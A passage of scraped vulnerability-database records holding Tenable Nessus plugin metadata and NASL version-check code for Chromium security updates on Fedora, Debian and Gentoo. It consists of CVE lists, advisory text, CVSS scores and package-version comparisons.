restrictions via a crafted HTML page. (CVE-2021-21189)\n\n - Uninitialized data in PDFium in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain\n potentially sensitive information from process memory via a crafted PDF file. (CVE-2021-21190)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-c88a96bd4b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21190\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21155\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Fedora' >!< release) audit(AUDIT_OS_NOT, 'Fedora');\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Fedora');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Fedora 32', 'Fedora ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Fedora', cpu);\n\npkgs = [\n {'reference':'chromium-89.0.4389.82-1.fc32', 'release':'FC32', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:27", "description": "Several vulnerabilites have been discovered in the chromium web browser.\n\n - CVE-2021-21159 Khalil Zhani discovered a buffer overflow issue in the tab implementation.\n\n - CVE-2021-21160 Marcin Noga discovered a buffer overflow issue in WebAudio.\n\n - CVE-2021-21161 Khalil Zhani discovered a buffer overflow issue in the tab implementation.\n\n - CVE-2021-21162 A use-after-free issue was discovered in the WebRTC implementation.\n\n - CVE-2021-21163 Alison Huffman discovered a data validation issue.\n\n - CVE-2021-21165 Alison Huffman discovered an error in the audio implementation.\n\n - CVE-2021-21166 Alison Huffman discovered an error in the audio implementation.\n\n - CVE-2021-21167 Leecraso and Guang Gong discovered a use-after-free issue in the bookmarks implementation.\n\n - CVE-2021-21168 Luan Herrera discovered a policy enforcement error in the appcache.\n\n - CVE-2021-21169 Bohan Liu and Moon Liang discovered an out-of-bounds access issue in the v8 JavaScript library.\n\n - CVE-2021-21170 David Erceg discovered a user interface error.\n\n - CVE-2021-21171 Irvan Kurniawan discovered a user interface error.\n\n - CVE-2021-21172 Maciej Pulikowski discovered a policy enforcement error in the File System API.\n\n - CVE-2021-21173 Tom Van Goethem discovered a network based information leak.\n\n - CVE-2021-21174 Ashish Guatam Kambled discovered an implementation error in the Referrer policy.\n\n - CVE-2021-21175 Jun Kokatsu discovered an implementation error in the Site Isolation feature.\n\n - CVE-2021-21176 Luan Herrera discovered an implementation error in the full screen mode.\n\n - CVE-2021-21177 Abdulrahman Alqabandi discovered a policy enforcement error in the Autofill feature.\n\n - CVE-2021-21178 Japong discovered an error in the Compositor implementation.\n\n - CVE-2021-21179 A use-after-free issue was discovered in the networking implementation.\n\n - CVE-2021-21180 Abdulrahman Alqabandi discovered a use-after-free issue in the tab search feature.\n\n - CVE-2021-21181 Xu Lin, Panagiotis Ilias, and Jason Polakis discovered a side-channel information leak in the Autofill feature.\n\n - CVE-2021-21182 Luan Herrera discovered a policy enforcement error in the site navigation implementation.\n\n - CVE-2021-21183 Takashi Yoneuchi discovered an implementation error in the Performance API.\n\n - CVE-2021-21184 James Hartig discovered an implementation error in the Performance API.\n\n - CVE-2021-21185 David Erceg discovered a policy enforcement error in Extensions.\n\n - CVE-2021-21186 dhirajkumarnifty discovered a policy enforcement error in the QR scan implementation.\n\n - CVE-2021-21187 Kirtikumar Anandrao Ramchandani discovered a data validation error in URL formatting.\n\n - CVE-2021-21188 Woojin Oh discovered a use-after-free issue in Blink/Webkit.\n\n - CVE-2021-21189 Khalil Zhani discovered a policy enforcement error in the Payments implementation.\n\n - CVE-2021-21190 Zhou Aiting discovered use of uninitialized memory in the pdfium library.\n\n - CVE-2021-21191 raven discovered a use-after-free issue in the WebRTC implementation.\n\n - CVE-2021-21192 Abdulrahman Alqabandi discovered a buffer overflow issue in the tab implementation.\n\n - CVE-2021-21193 A use-after-free issue was discovered in Blink/Webkit.\n\n - CVE-2021-21194 Leecraso and Guang Gong discovered a use-after-free issue in the screen capture feature.\n\n - CVE-2021-21195 Liu and Liang discovered a use-after-free issue in the v8 JavaScript library.\n\n - CVE-2021-21196 Khalil Zhani discovered a buffer overflow issue in the tab implementation.\n\n - CVE-2021-21197 Abdulrahman Alqabandi discovered a buffer overflow issue in the tab implementation.\n\n - CVE-2021-21198 Mark Brand discovered an out-of-bounds read issue in the Inter-Process Communication implementation.\n\n - CVE-2021-21199 Weipeng Jiang discovered a use-after-free issue in the Aura window and event manager.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-07T00:00:00", "type": "nessus", "title": "Debian DSA-4886-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193", "CVE-2021-21194", "CVE-2021-21195", "CVE-2021-21196", "CVE-2021-21197", "CVE-2021-21198", "CVE-2021-21199"], "modified": "2022-01-24T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4886.NASL", "href": "https://www.tenable.com/plugins/nessus/148364", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4886. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(148364);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\"CVE-2021-21159\", \"CVE-2021-21160\", \"CVE-2021-21161\", \"CVE-2021-21162\", \"CVE-2021-21163\", \"CVE-2021-21165\", \"CVE-2021-21166\", \"CVE-2021-21167\", \"CVE-2021-21168\", \"CVE-2021-21169\", \"CVE-2021-21170\", \"CVE-2021-21171\", \"CVE-2021-21172\", \"CVE-2021-21173\", \"CVE-2021-21174\", \"CVE-2021-21175\", \"CVE-2021-21176\", \"CVE-2021-21177\", \"CVE-2021-21178\", \"CVE-2021-21179\", \"CVE-2021-21180\", \"CVE-2021-21181\", \"CVE-2021-21182\", \"CVE-2021-21183\", \"CVE-2021-21184\", \"CVE-2021-21185\", \"CVE-2021-21186\", \"CVE-2021-21187\", \"CVE-2021-21188\", \"CVE-2021-21189\", \"CVE-2021-21190\", \"CVE-2021-21191\", \"CVE-2021-21192\", \"CVE-2021-21193\", \"CVE-2021-21194\", \"CVE-2021-21195\", \"CVE-2021-21196\", \"CVE-2021-21197\", \"CVE-2021-21198\", \"CVE-2021-21199\");\n script_xref(name:\"DSA\", value:\"4886\");\n script_xref(name:\"IAVA\", value:\"2021-A-0152-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Debian DSA-4886-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilites have been discovered in the chromium web\nbrowser.\n\n - CVE-2021-21159\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21160\n Marcin Noga discovered a buffer overflow issue in\n WebAudio.\n\n - CVE-2021-21161\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21162\n A use-after-free issue was discovered in the WebRTC\n implementation.\n\n - CVE-2021-21163\n Alison Huffman discovered a data validation issue.\n\n - CVE-2021-21165\n Alison Huffman discovered an error in the audio\n implementation.\n\n - CVE-2021-21166\n Alison Huffman discovered an error in the audio\n implementation.\n\n - CVE-2021-21167\n Leecraso and Guang Gong discovered a use-after-free\n issue in the bookmarks implementation.\n\n - CVE-2021-21168\n Luan Herrera discovered a policy enforcement error in\n the appcache.\n\n - CVE-2021-21169\n Bohan Liu and Moon Liang discovered an out-of-bounds\n access issue in the v8 JavaScript library.\n\n - CVE-2021-21170\n David Erceg discovered a user interface error.\n\n - CVE-2021-21171\n Irvan Kurniawan discovered a user interface error.\n\n - CVE-2021-21172\n Maciej Pulikowski discovered a policy enforcement error\n in the File System API.\n\n - CVE-2021-21173\n Tom Van Goethem discovered a network based information\n leak.\n\n - CVE-2021-21174\n Ashish Guatam Kambled discovered an implementation error\n in the Referrer policy.\n\n - CVE-2021-21175\n Jun Kokatsu discovered an implementation error in the\n Site Isolation feature.\n\n - CVE-2021-21176\n Luan Herrera discovered an implementation error in the\n full screen mode.\n\n - CVE-2021-21177\n Abdulrahman Alqabandi discovered a policy enforcement\n error in the Autofill feature.\n\n - CVE-2021-21178\n Japong discovered an error in the Compositor\n implementation.\n\n - CVE-2021-21179\n A use-after-free issue was discovered in the networking\n implementation.\n\n - CVE-2021-21180\n Abdulrahman Alqabandi discovered a use-after-free issue\n in the tab search feature.\n\n - CVE-2021-21181\n Xu Lin, Panagiotis Ilias, and Jason Polakis discovered a\n side-channel information leak in the Autofill feature.\n\n - CVE-2021-21182\n Luan Herrera discovered a policy enforcement error in\n the site navigation implementation.\n\n - CVE-2021-21183\n Takashi Yoneuchi discovered an implementation error in\n the Performance API.\n\n - CVE-2021-21184\n James Hartig discovered an implementation error in the\n Performance API.\n\n - CVE-2021-21185\n David Erceg discovered a policy enforcement error in\n Extensions.\n\n - CVE-2021-21186\n dhirajkumarnifty discovered a policy enforcement error\n in the QR scan implementation.\n\n - CVE-2021-21187\n Kirtikumar Anandrao Ramchandani discovered a data\n validation error in URL formatting.\n\n - CVE-2021-21188\n Woojin Oh discovered a use-after-free issue in\n Blink/Webkit.\n\n - CVE-2021-21189\n Khalil Zhani discovered a policy enforcement error in\n the Payments implementation.\n\n - CVE-2021-21190\n Zhou Aiting discovered use of uninitialized memory in\n the pdfium library.\n\n - CVE-2021-21191\n raven discovered a use-after-free issue in the WebRTC\n implementation.\n\n - CVE-2021-21192\n Abdulrahman Alqabandi discovered a buffer overflow issue\n in the tab implementation.\n\n - CVE-2021-21193\n A use-after-free issue was discovered in Blink/Webkit.\n\n - CVE-2021-21194\n Leecraso and Guang Gong discovered a use-after-free\n issue in the screen capture feature.\n\n - CVE-2021-21195\n Liu and Liang discovered a use-after-free issue in the\n v8 JavaScript library.\n\n - CVE-2021-21196\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21197\n Abdulrahman Alqabandi discovered a buffer overflow issue\n in the tab implementation.\n\n - CVE-2021-21198\n Mark Brand discovered an out-of-bounds read issue in the\n Inter-Process Communication implementation.\n\n - CVE-2021-21199\n Weipeng Jiang discovered a use-after-free issue in the\n Aura window and event manager.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21166\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21167\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21168\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21171\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21176\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21178\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21179\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21180\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21181\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21187\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21188\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21189\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21193\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21194\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21195\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21198\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21199\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4886\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 89.0.4389.114-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21199\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-shell\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:22", "description": "The remote host is affected by the vulnerability described in GLSA-202104-08 (Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the CVE identifiers referenced below for details.\n Impact :\n\n Please review the referenced CVE identifiers for details.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-05-03T00:00:00", "type": "nessus", "title": "GLSA-202104-08 : Chromium, Google Chrome: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21142", "CVE-2021-21143", "CVE-2021-21144", "CVE-2021-21145", "CVE-2021-21146", "CVE-2021-21147", "CVE-2021-21148", "CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-2119", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193", "CVE-2021-21194", "CVE-2021-21195", "CVE-2021-21196", "CVE-2021-21197", "CVE-2021-21198", "CVE-2021-21199", "CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21206", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21220", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2022-12-07T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "p-cpe:/a:gentoo:linux:google-chrome", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202104-08.NASL", "href": "https://www.tenable.com/plugins/nessus/149223", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202104-08.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149223);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2021-21142\", \"CVE-2021-21143\", \"CVE-2021-21144\", \"CVE-2021-21145\", \"CVE-2021-21146\", \"CVE-2021-21147\", \"CVE-2021-21148\", \"CVE-2021-21149\", \"CVE-2021-21150\", \"CVE-2021-21151\", \"CVE-2021-21152\", \"CVE-2021-21153\", \"CVE-2021-21154\", \"CVE-2021-21155\", \"CVE-2021-21156\", \"CVE-2021-21157\", \"CVE-2021-21159\", \"CVE-2021-21160\", \"CVE-2021-21161\", \"CVE-2021-21162\", \"CVE-2021-21163\", \"CVE-2021-21165\", \"CVE-2021-21166\", \"CVE-2021-21167\", \"CVE-2021-21168\", \"CVE-2021-21169\", \"CVE-2021-21170\", \"CVE-2021-21171\", \"CVE-2021-21172\", \"CVE-2021-21173\", \"CVE-2021-21174\", \"CVE-2021-21175\", \"CVE-2021-21176\", \"CVE-2021-21177\", \"CVE-2021-21178\", \"CVE-2021-21179\", \"CVE-2021-21180\", \"CVE-2021-21181\", \"CVE-2021-21182\", \"CVE-2021-21183\", 